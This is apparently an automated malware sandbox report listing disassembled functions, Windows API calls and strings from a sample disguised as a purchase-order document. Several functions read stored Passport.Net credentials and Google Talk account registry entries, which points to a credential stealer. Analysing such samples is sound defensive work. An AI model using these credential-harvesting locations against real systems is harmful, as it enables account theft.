                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                • API String ID: 3071782539-966475738
                                                                                • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 367 40f6e2-40f70a call 40466b call 4045db 372 40f710-40f717 call 404734 367->372 373 40f7e9-40f801 call 404656 call 404785 367->373 372->373 378 40f71d-40f72e CredReadA 372->378 378->373 380 40f734-40f73a 378->380 382 40f740-40f743 380->382 383 40f7e5 380->383 382->383 384 40f749-40f759 382->384 383->373 385 40f75a-40f770 384->385 385->385 386 40f772-40f795 call 4047a5 385->386 389 40f7e2 386->389 390 40f797-40f7b6 WideCharToMultiByte 386->390 389->383 391 40f7b8-40f7c6 strlen 390->391 392 40f7d9-40f7dc LocalFree 390->392 391->392 393 40f7c8-40f7d8 _mbscpy 391->393 392->389 393->392
                                                                                APIs
                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                                                • String ID: Passport.Net\*
                                                                                • API String ID: 4000595657-3671122194
                                                                                • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 394 40ccd7-40cd06 ??2@YAPAXI@Z 395 40cd08-40cd0d 394->395 396 40cd0f 394->396 397 40cd11-40cd24 ??2@YAPAXI@Z 395->397 396->397 398 40cd26-40cd2d call 404025 397->398 399 40cd2f 397->399 400 40cd31-40cd57 398->400 399->400 402 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 400->402 403 40cd59-40cd60 DeleteObject 400->403 403->402
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                • memset.MSVCRT ref: 0040CD96
                                                                                • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                • String ID:
                                                                                • API String ID: 2054149589-0
                                                                                • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 411 44b40e-44b415 GetModuleHandleA 412 44b455 411->412 413 44b417-44b426 call 44b42b 411->413 415 44b457-44b45b 412->415 422 44b48d 413->422 423 44b428-44b433 GetProcAddress 413->423 417 44b45d-44b465 GetModuleHandleA 415->417 418 44b49a call 44b49f 415->418 421 44b467-44b46f 417->421 421->421 424 44b471-44b474 421->424 426 44b48e-44b496 422->426 423->412 427 44b435-44b442 VirtualProtect 423->427 424->415 425 44b476-44b478 424->425 428 44b47e-44b486 425->428 429 44b47a-44b47c 425->429 435 44b498 426->435 431 44b454 427->431 432 44b444-44b452 VirtualProtect 427->432 433 44b487-44b488 GetProcAddress 428->433 429->433 431->412 432->431 433->422 435->424
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                  • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                  • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                  • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2099061454-0
                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                • memset.MSVCRT ref: 00408620
                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                • memset.MSVCRT ref: 00408671
                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                Strings
                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                • API String ID: 1366857005-1079885057
                                                                                • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 882979914-1578091866
                                                                                • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                  • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                  • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                  • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                  • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2099061454-0
                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 2152742572-0
                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                APIs
                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75920A60,?,00000000), ref: 00410D1C
                                                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                • memset.MSVCRT ref: 00410E10
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 889583718-2036018995
                                                                                • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004109F7
                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                • memset.MSVCRT ref: 00410A32
                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                • String ID:
                                                                                • API String ID: 3143880245-0
                                                                                • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D5C
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D7A
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D98
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408DA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                APIs
                                                                                • malloc.MSVCRT ref: 00406F4C
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,75920A60,00407A43,00000001,?,00000000,75920A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                • free.MSVCRT ref: 00406F6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: freemallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3056473165-0
                                                                                • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                APIs
                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFontIndirect_mbscpymemset
                                                                                • String ID: Arial
                                                                                • API String ID: 3853255127-493054409
                                                                                • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                APIs
                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$_strcmpimemset
                                                                                • String ID: /stext
                                                                                • API String ID: 520177685-3817206916
                                                                                • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                APIs
